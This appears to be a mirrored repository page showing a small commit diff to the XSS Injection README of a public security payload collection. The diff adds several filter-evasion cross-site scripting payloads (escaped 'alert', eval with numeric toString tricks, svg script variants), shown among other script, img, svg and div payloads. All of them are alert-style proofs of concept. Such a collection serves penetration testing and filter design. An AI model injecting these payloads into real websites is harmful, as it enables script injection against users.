ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-30 15:15:04 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #397 from c14dd49h/master

Browse Source 
Update README.md
This commit is contained in:
Swissky 2021-07-31 11:29:08 +02:00 committed by GitHub
commit b3f5637103
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
XSS Injection/README.md
View File

@ -158,6 +158,9 @@ Most tools are also suitable for blind XSS attacks:
<scr<script>ipt>alert('XSS')</scr<script>ipt> <scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script> "><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script> "><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
// Img payload // Img payload
<img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS');>
@ -177,6 +180,8 @@ Most tools are also suitable for blind XSS attacks:
"><svg/onload=alert(String.fromCharCode(88,83,83))> "><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/) "><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script) <svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)
<svg><script>alert('33')
<svg><script>alert&lpar;'33'&rpar;
// Div payload // Div payload
<div onpointerover="alert(45)">MOVE HERE</div> <div onpointerover="alert(45)">MOVE HERE</div>